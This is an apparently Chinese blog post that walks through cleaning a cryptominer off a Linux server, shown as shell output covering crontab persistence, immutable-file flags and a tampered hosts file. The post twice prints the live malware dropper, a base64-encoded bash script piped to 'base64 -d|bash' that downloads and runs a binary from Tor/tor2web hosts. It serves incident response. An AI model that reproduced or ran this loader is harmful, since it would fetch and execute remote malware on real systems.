记录一次挖矿病毒删除过程

最新推荐文章于 2025-04-11 21:47:21 发布
原创 最新推荐文章于 2025-04-11 21:47:21 发布 · 2.8k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux 

[root@DIST /]# top

top - 21:24:35 up 59 days,  3:13,  2 users,  load average: 7.39, 7.40, 7.34
Tasks: 200 total,   2 running, 198 sleeping,   0 stopped,   0 zombie
%Cpu(s): 99.5 us,  0.3 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.2 si,  0.0 st
KiB Mem : 16268024 total,  1557392 free,  7288868 used,  7421764 buff/cache
KiB Swap:  1679356 total,  1672956 free,     6400 used.  7746200 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                  
 8092 root      20   0 2444864   3380      4 S 597.0  0.0   2206:14 MWV7Gk                                   
27473 root      20   0 8997140 891104  11104 S   2.7  5.5 361:48.38 java                                     
  794 root      20   0  317100  19592   4336 S   0.3  0.1  34:31.64 vmtoolsd                                 
12492 root      20   0  137060   7820   1248 S   0.3  0.0  42:24.92 redis-server                             
    1 root      20   0  190924   3304   2200 S   0.0  0.0  10:52.63 systemd                                  
    2 root      20   0       0      0      0 S   0.0  0.0   0:00.38 kthreadd                                 
    3 root      20   0       0      0      0 S   0.0  0.0   1:46.13 ksoftirqd/0                              
    5 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                             
    7 root      rt   0       0      0      0 S   0.0  0.0   0:05.55 migration/0                              
    8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                                   
    9 root      20   0       0      0      0 R   0.0  0.0  41:17.35 rcu_sched                                
   10 root      rt   0       0      0      0 S   0.0  0.0   0:47.52 watchdog/0                               
   11 root      rt   0       0      0      0 S   0.0  0.0   0:59.00 watchdog/1                               
   12 root      rt   0       0      0      0 S   0.0  0.0   0:12.19 migration/1                              
   13 root      20   0       0      0      0 S   0.0  0.0  24:09.37 ksoftirqd/1                              
   15 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H                             
   16 root      rt   0       0      0      0 S   0.0  0.0   1:08.07 watchdog/2                               
Fields Management for window 1:Def, whose current sort field is %CPU
   Navigate with Up/Dn, Right selects for move then <Enter> or Left commits,
   'd' or <Space> toggles display, 's' sets sort.  Use 'q' or <Esc> to end!

* PID     = Process Id             PGRP    = Process Group Id       vMj     = Major Faults delta  
* USER    = Effective User Name    TTY     = Controlling Tty        vMn     = Minor Faults delta  
* PR      = Priority               TPGID   = Tty Process Grp Id     USED    = Res+Swap Size (KiB) 
* NI      = Nice Value             SID     = Session Id             nsIPC   = IPC namespace Inode 
* VIRT    = Virtual Image (KiB)    nTH     = Number of Threads      nsMNT   = MNT namespace Inode 
* RES     = Resident Size (KiB)    P       = Last Used Cpu (SMP)    nsNET   = NET namespace Inode 
* SHR     = Shared Memory (KiB)    TIME    = CPU Time               nsPID   = PID namespace Inode 
* S       = Process Status         SWAP    = Swapped Size (KiB)     nsUSER  = USER namespace Inode
* %CPU    = CPU Usage              CODE    = Code Size (KiB)        nsUTS   = UTS namespace Inode 
* %MEM    = Memory Usage (RES)     DATA    = Data+Stack (KiB)    
* TIME+   = CPU Time, hundredths   nMaj    = Major Page Faults   
* COMMAND = Command Name/Line      nMin    = Minor Page Faults   
  PPID    = Parent Process pid     nDRT    = Dirty Pages Count   
  UID     = Effective User Id      WCHAN   = Sleeping in Function
  RUID    = Real User Id           Flags   = Task Flags <sched.h>
  RUSER   = Real User Name         CGROUPS = Control Groups      
  SUID    = Saved User Id          SUPGIDS = Supp Groups IDs     
  SUSER   = Saved User Name        SUPGRPS = Supp Groups Names   
  GID     = Group Id               TGID    = Thread Group Id     
  GROUP   = Group Name             ENVIRON = Environment vars    
  
[root@DIST /]# crontab -l
33 * * * * /root/.bffbe > /dev/null 2>&1 &
[root@DIST /]# tail /etc/crontab

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

[root@DIST /]# cd /root/
[root@DIST ~]# ls
1.sh                                      openssh-7.9p1
2.sh                                      openssl-1.0.2k-12.el7.x86_64.rpm
3.sh                                      openssl-1.0.2k-16.el7_6.1.x86_64.rpm
a.gz                                      openssl-1.0.2q

[root@DIST ~]# cat .bffbe
#!/bin/bash
exec &>/dev/null
echo bffbe
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0zMDAiKQp0PSQoZWNobyAidHJ1bXB6YmZmYmV3eTNnbiIpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoKCRjIGh0dHBzOi8vZG5zLnJ1YnlmaXNoLmNuLyRwIHx8CiAgICAgJGMgaHR0cHM6Ly9kbnMudHduaWMudHcvJHAgfHwKICAgICAkYyBodHRwczovL2RvaC5kbnMuc2IvJHAgfHwKICAgICAkYyBodHRwczovL2kuMjMzcHkuY29tLyRwKVwKICAgICB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8c2VkICckIGQnfHNvcnQgLVJ8aGVhZCAtMSApCgp1KCkgewpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCmZvciBpIGluICRkIC90bXAgL3Zhci90bXAgL2Rldi9zaG0gL3Vzci9iaW4gO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCB8fCAkYyAkMSRmIC1vJHgKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLmlvIHRvcjJ3ZWIuc3UKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDApL2lvOyB0aGVuCnUgJHQuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@DIST ~]# 

[root@DIST ~]# crontab -r
[root@DIST ~]# crontab -l
no crontab for root

[root@DIST etc]# cd /root
[root@DIST ~]# rm -rf .bffbe
rm: cannot remove ‘.bffbe’: Operation not permitted
[root@DIST ~]# lsattr -a
---------------- ./.
---------------- ./..
---------------- ./.bash_logout
---------------- ./.bashrc
---------------- ./.cshrc
---------------- ./.tcshrc
---------------- ./anaconda-ks.cfg
---------------- ./.bash_history
---------------- ./2.sh
---------------- ./3.sh
---------------- ./1.sh
---------------- ./zlib-1.2.11
----i----------- ./.bffbe
---------------- ./.bashtemp
----i----------- ./.systemd-login
[root@DIST ~]# chattr -i .bffbe
[root@DIST ~]# rm -rf .bffbe 

[root@DIST ~]# ls -lt /etc | head 
total 1240
drwxr-xr-x.  2 root root     85 Mar  2 14:50 cron.d
----------   1 root root      0 Mar  2 14:50 cfly
----------   1 root root      0 Mar  2 14:50 httpdz
----------   1 root root      0 Mar  2 14:50 migrations
-rw-r--r--   1 root root   1296 Mar  2 14:50 hosts
----------   1 root root    826 Mar  1 21:39 shadow
-rw-r--r--   1 root root     53 Feb 25 01:35 resolv.conf
-rw-r--r--   1 root root  37897 Feb 24 03:47 ld.so.cache
drwxr-xr-x.  2 root root     23 Feb  6 03:56 cron.daily

[root@DIST ~]# cd /etc
[root@DIST etc]# lsattr hosts
----i----------- hosts
[root@DIST etc]# chattr -i hosts
[root@DIST etc]# vi hosts
[root@DIST etc]# cat /etc/hosts
0.0.0.0		Rainbow66.f3322.net
0.0.0.0		rapid7cpfqnwxodo.tor2web.fyi
0.0.0.0		aptgetgxqs3secda.onion.ly
0.0.0.0		intelbagjop7nzm5.onion.glass
127.0.0.1		localhost
0.0.0.0		systemten.org
0.0.0.0		rapid7cpfqnwxodo.onion.ly
0.0.0.0		upir.ir

0.0.0.0		tor2web.io
0.0.0.0		intelbagjop7nzm5.onion.sh


0.0.0.0		pm.cpuminerpool.com
0.0.0.0		gitee.com

0.0.0.0		intelbagjop7nzm5.onion.mn
0.0.0.0		w.21-3n.xyz
0.0.0.0		aptgetgxqs3secda.onion.pet
0.0.0.0		lsd.systemten.org
0.0.0.0		timesync.su
0.0.0.0		aptgetgxqs3secda.onion.in.net
0.0.0.0		intelbagjop7nzm5.tor2web.io
0.0.0.0		intelbagjop7nzm5.onion.to
0.0.0.0		aptgetgxqs3secda.tor2web.fyi
0.0.0.0		an7kmd2wp4xo7hpr.onion.sh
0.0.0.0		an7kmd2wp4xo7hpr.d2web.org

0.0.0.0		rapid7cpfqnwxodo.onion.pet
0.0.0.0		an7kmd2wp4xo7hpr.tor2web.su

0.0.0.0		lsdu.b-cdn.net

0.0.0.0		an7kmd2wp4xo7hpr.timesync.su
0.0.0.0		img.sobot.com
0.0.0.0		rainbow20.eatuo.com
0.0.0.0		w.3ei.xyz
0.0.0.0		rapid7cpfqnwxodo.onion.in.net
0.0.0.0		aliyun.one

0.0.0.0		intelbagjop7nzm5.d2web.org
0.0.0.0		thyrsi.com
0.0.0.0		pastebin.com

0.0.0.0		intelbagjop7nzm5.onion.in.net

[root@DIST /]# ll
total 28
drwxr-xr-x    3 root root   25 Jul 23  2019 backup
lrwxrwxrwx.   1 root root    7 Dec 18  2018 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Jun 24  2019 boot
drwxr-xr-x    3 root root   18 Jun  3  2019 data
drwxr-xr-x   20 root root 3220 Jan  3 17:58 dev
drwxr-xr-x.  87 root root 8192 Mar  2 22:12 etc
drwxr-xr-x.   2 root root    6 Nov  5  2016 home
lrwxrwxrwx.   1 root root    7 Dec 18  2018 lib -> usr/lib
drwxr-xr-x    2 root root   59 Mar  2 14:50 lib32
lrwxrwxrwx.   1 root root    9 Dec 18  2018 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Nov  5  2016 media
drwxr-xr-x.   2 root root    6 Nov  5  2016 mnt
drwxr-xr-x.   6 root root  124 Mar  2 00:13 opt
dr-xr-xr-x  210 root root    0 Jan  3 17:58 proc
dr-xr-x---.  22 root root 4096 Mar  2 22:14 root
drwxr-xr-x   25 root root  740 Feb 25 01:35 run
lrwxrwxrwx.   1 root root    8 Dec 18  2018 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Nov  5  2016 srv
dr-xr-xr-x   13 root root    0 Jan  3 17:58 sys
d---------.  13 root root 4096 Mar  1 00:02 tmp
drwxr-xr-x    3 root root   23 Nov 11 15:32 Users
drwxr-xr-x.  14 root root  167 Jun  4  2019 usr
drwxr-xr-x.  19 root root  267 Jun 24  2019 var
-rw-r--r--    1 root root    4 Oct 21 16:34 zookeeper_server.pid
[root@DIST /]# chmod 755 tmp

[root@DIST tmp]# cd /etc
[root@DIST etc]# cd cron.d
[root@DIST cron.d]# ls
0bffbe  0hourly  0qcloud-stargate-admin-start  tomcat
[root@DIST cron.d]# ll
total 12
-rw-r--r--  1 root root  46 Nov 20  2015 0bffbe
-rw-r--r--. 1 root root 128 Mar 31  2016 0hourly
-rw-r--r--  1 root root  71 Nov 20  2015 0qcloud-stargate-admin-start
----------  1 root root   0 Mar  2 14:50 tomcat

[root@DIST cron.d]# cat 0bffbe 
53 * * * * root /opt/bffbe > /dev/null 2>&1 &
[root@DIST cron.d]# cd /opt
[root@DIST opt]# ls
bffbe  nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu

[root@DIST opt]# cat bffbe
#!/bin/bash
exec &>/dev/null
echo bffbe
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0zMDAiKQp0PSQoZWNobyAidHJ1bXB6YmZmYmV3eTNnbiIpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoKCRjIGh0dHBzOi8vZG5zLnJ1YnlmaXNoLmNuLyRwIHx8CiAgICAgJGMgaHR0cHM6Ly9kbnMudHduaWMudHcvJHAgfHwKICAgICAkYyBodHRwczovL2RvaC5kbnMuc2IvJHAgfHwKICAgICAkYyBodHRwczovL2kuMjMzcHkuY29tLyRwKVwKICAgICB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8c2VkICckIGQnfHNvcnQgLVJ8aGVhZCAtMSApCgp1KCkgewpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCmZvciBpIGluICRkIC90bXAgL3Zhci90bXAgL2Rldi9zaG0gL3Vzci9iaW4gO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCB8fCAkYyAkMSRmIC1vJHgKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLmlvIHRvcjJ3ZWIuc3UKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDApL2lvOyB0aGVuCnUgJHQuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@DIST opt]# lsattr
---------------- ./perfstats-to-syslog
---------------- ./qcloud-stargate-admin-start.sh
----i----------- ./bffbe
---------------- ./nu
---------------- ./yilu
---------------- ./nginx-0.12

[root@DIST opt]# rm -rf bffbe
rm: cannot remove ‘bffbe’: Operation not permitted
[root@DIST opt]# chattr -i bffbe 
[root@DIST opt]# ls
bffbe  nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu
[root@DIST opt]# rm -rf bffbe
[root@DIST opt]# ls
nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu

[root@DIST opt]# cd /etc
[root@DIST etc]# cd /cron.d
-bash: cd: /cron.d: No such file or directory
[root@DIST etc]# cd cron.d
[root@DIST cron.d]# ls
0bffbe  0hourly  0qcloud-stargate-admin-start  tomcat
[root@DIST cron.d]# lsattr 
---------------- ./0hourly
---------------- ./0qcloud-stargate-admin-start
---------------- ./0bffbe
---------------- ./tomcat
[root@DIST cron.d]# rm 0rf 0bffbe
rm: cannot remove ‘0rf’: No such file or directory
rm: remove regular file ‘0bffbe’? y
Window应急响应(四):挖矿病毒
08-05 5396
0x00 前言 ​ 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升高,风扇噪声增大等问题。 0x01 应急场景 ​ 某天上午重启服务器的时候,发现程序启动很慢,打开任务管理器,发现cpu被占用接近100%,服务器资源占用严重。 0x02 事件分析 ...
挖矿僵尸网络蠕虫病毒——kdevtmpfsi的处理过程及数据库
HackGJN的博客
09-27 777
其中,kdevtmpfsi是一种特别具有挑战性的病毒,它利用系统中的kdevtmpfsi进程进行挖矿活动,并且具有自我复制和传播的能力。隔离和停止传播:为了防止病毒进一步传播和感染其他系统,对受感染的主机进行隔离是必要的。日志和审计:数据库可以记录系统的日志和审计信息,包括病毒活动的时间、位置和影响范围等。系统修复和加固:一旦病毒被清除,需要对受感染的系统进行修复和加固,以防止未来的攻击。通过使用数据库中的数据,网络管理员可以确保系统中的所有组件都是最新的,从而减少病毒入侵的风险。
什么是挖矿病毒?
liu854046222的专栏
10-19 3690
挖矿病毒是一种新型的网络威胁,其主要目的是。
干货满满!教你如何应对挖矿病毒, 从零基础到精通,收藏这篇就够了!
最新发布
logic1001的博客
04-11 1334
随着虚拟货币的疯狂炒作,网络黑客将挖矿程序伪装成一个正常的文件,通过。
服务器(Linux挖矿木马病毒(kswapd0进程使cpu爆满)
小韩的博客
04-03 3万+
服务器(Linux挖矿木马病毒(kswapd0进程使cpu爆满)
挖矿病毒清理
chunhua1026的专栏
09-01 2683
前言: 今天登录vCenter,发现公司虚机一片告警,很罕见的场景~ 操作步骤: 首先通过SecureCRT或XShell登录目标虚机,也可通过cmd窗口:ssh root@10.6.6.*登录。 查看是否中毒,执行top命令 本次以10.6.6.52这台虚机为例,cpu 4核,如下图所示,这是中了挖矿病毒的截图,第1个进程将4核cpu全部占满,command为一段随机字符串。如果top显示并没有此进程,恭喜你并未中招,下面的章节忽略就好。 另一个检查方法,查看是否有此文件:/opt/unixdb
常见挖矿病毒处理方法(qW3xT/Ddgs.3011/S01wipefs/acpidtd/MSFC)
热门推荐
story-xu的博客
08-09 3万+
常见挖矿病毒处理方法 1、常见病毒 病毒名称:qW3xT: 现象:占用超高CPU,进程查杀之后自启动。 中毒案例:(……) 2、病毒名称:Ddgs.3011 现象:占用超高CPU,进程查杀之后自启动。 中毒案例:(……) 3、病毒名称:S01wipefs 现象:占用超高CPU,无定时任务,但是病毒源文件存放在较多位置,比较难清除干净。 中毒案例:(……) 4、病毒名称:acpidtd 现象:占用超...
【实战】记录一次服务器挖矿病毒处理
weixin_45694388的博客
07-25 1810
信息收集及kill: 查看监控显示长期CPU利用率超高,怀疑中了病毒 top 命令查看进程资源占用: netstat -lntupa 命令查看有无ip进行发包 netstat -antp 然而并没有找到对应的进程名 查看java进程和solr进程 ps aux :查看所有进程 除相关进程:kill -9(无条件退出进程) 为了防止有定时任务,再次启动恶意进程 crontab -l 命令查看正在进行中的定时任务 crontab -r 删除所有定时任务 居然没有???? 保存样本,删除
挖矿病毒应急响应处置手册
安全狐
03-21 990
通常来说,当我们的服务器或PC资源(CPU)使用率接近或超过100%,并持续高居不下导致服务器或PC操作延缓,我们就可以判定被挖矿。常见挖矿其它特征如下:服务器或PC访问过不受信任的地址,这些地址包括:主机、IP、域名。这是由于大部分挖矿都需要从一个不受信任的地址下载初始化程序,而不受信任的来源主要是:第三方情报结构,企业内部历史数据沉淀。服务器或PC新增异常或恶意文件、进程或服务,并且大部分异常文件保存在服务器或PC的TMP目录中。服务器或PC的定时任务发生变更。
记录一次挖矿病毒来袭
weixin_41762839的博客
06-08 831
各位小伙伴,今天又是一次因为tomat版本过低有漏洞,通过tomcat sql注入的挖矿病毒,这东西烦得很; 一大早刚来同事就跟我说服务器卡的要死,我心一惊,一想没准又是被黑,上去一看,果不其然,又中招了,防不胜防啊! top看了一下,卧槽,果然又是这个鬼东西! 果断查找进程位置; ll /proc/19778 根据以往经验,可能不全面,执行以下几步: 1.马上解锁降权 chattr -i /* chmod 444 ./* chmod -x ./* 2.改属...
记录一次Linux解决sysupdata挖矿病毒过程
The_right_one的博客
05-31 992
记录一次Linux解决sysupdata挖矿病毒过程 公司项目上线测试时发现有进程后台cpu占用过高,根据进程名称及端口号找到文件所在位置为/etc/sysupdata该文件,网上一查发现是病毒文件对应的还有其他四个文件: updata.sh config.json networkservics sysguerd(该文件未添加i权限可以直接rm -rf 文件名 直接删除) 解决办法 1.先尝试解决 找到病毒文件了现在就是直接删除看看: 很明显这个文件不能删除有权限 网上的方法是使用chat
linux x11 挖矿病毒,应急响应:记一次花样贼多的挖矿病毒
weixin_39542093的博客
05-13 723
一次 “无文件”、“无进程”,在系统中 “几乎” 看不到异常的高配挖矿病毒处置实例 。0x00 正经的内容介绍本文记录一次表象是 “无文件”、“无进程”,在系统中 “几乎” 看不到异常的高配挖矿病毒处置实例 ,包括处置过程,以及逆向分析其 原理实现,感兴趣的朋友我们一起抽丝剥茧,拨云见日。? 通过本文可以收获到:几个Linux应急处置小知识看不到文件、网络、进程?背后的原理解析!几个过时的表情包...
应急响应-Windows-挖矿病毒
Sgirll的博客
05-14 1654
随着虚拟货币市场的繁荣,挖矿病毒已成为网络安全领域一大挑战。该类病毒利用计算机资源进行加密货币的挖掘,给个人用户和企业网络带来了严重的安全风险。本文将针对挖矿病毒的应急响应和防范措施进行分析和总结。
挖矿病毒的处理
hg00_11的博客
06-16 837
https://www.cnblogs.com/heian99/p/12865374.html
linux挖矿病毒分析
清扬叶
04-01 1604
发现问题: 在查询进程端口号占用时,发现查询特别慢,而当时运行的程序又很少,于是执行top命令发现存在一个networkservice进程的cpu占用率超过了100%,如图所示: networkservice和sysupdate都不是我们自己的运行程序,于是百度了一下,发现是linux挖矿病毒。 处理问题: 使用top查询到networkservice和...
挖矿病毒知多少?零基础入门到精通, 收藏这篇就够了
logic1001的博客
11-06 1240
*“挖矿病毒是一段代码或者一个软件,伪装成一个正常文件进入受害者的电脑。**黑客利用弱口令等高危漏洞,把“挖矿病毒植入到他人电脑、服务器里,使用被控制的电脑进行非法“挖矿”。“挖矿病毒会消耗大量的计算机处理资源。
Linux服务器挖矿病毒处理
自己在学习过程中的总结
06-19 3250
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
一次挖矿病毒的溯源
蚁景网安学院
12-15 1787
客户打电话过来说,公司web服务异常卡顿。起初以为是web服务缓存过多导致,重启几次无果后觉得可能是受到了攻击。起初以为是ddos攻击,然后去查看web服务器管理面板时发现网络链接很少,但是cpu占用高达99%,于是便怀疑是中了挖矿病毒
【2025版】最新手把手病毒分析 | 挖矿病毒处置总结,从零基础到精通,收藏这篇就够了!
Python_0011的博客
02-12 856
我们是_
【转】服务器挖矿病毒的排查过程
05-25
服务器挖矿病毒是指黑客通过入侵服务器,利用服务器的计算资源进行加密货币挖矿。这种病毒的存在会导致服务器性能下降,甚至导致服务器崩溃。以下是排查服务器挖矿病毒过程。 1. 检查CPU和内存使用率 服务器挖矿病毒会占用服务器的大量计算资源,导致CPU和内存使用率异常升高。通过检查系统监视器或者运行top命令,可以查看当前的CPU和内存使用率,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 2. 检查网络流量 服务器挖矿病毒需要与矿池进行通信,因此会产生大量的网络流量。通过检查网络监视器或者运行iftop命令,可以查看当前的网络流量,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 3. 检查进程列表 服务器挖矿病毒会在服务器上运行挖矿程序,因此会在进程列表中留下痕迹。通过运行ps命令,可以查看当前的进程列表,如果发现有可疑的进程,则很可能是服务器挖矿病毒导致的。 4. 检查系统日志 服务器挖矿病毒会在服务器上留下痕迹,因此可以通过检查系统日志来发现异常行为。通过查看/var/log/auth.log、/var/log/syslog等系统日志文件,可以查找异常登录或者异常命令执行的记录,如果发现可疑行为,则很可能是服务器挖矿病毒导致的。 5. 检查防火墙日志 服务器挖矿病毒需要与矿池进行通信,因此需要打开服务器的防火墙端口。通过检查防火墙日志,可以查看服务器上的网络连接情况,如果发现与矿池的连接,则很可能是服务器挖矿病毒导致的。 以上是排查服务器挖矿病毒的基本过程,如果发现服务器确实感染了挖矿病毒,则需要及时采取措施清除病毒,并加强服务器的安全防护措施,避免类似的攻击再次发生。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值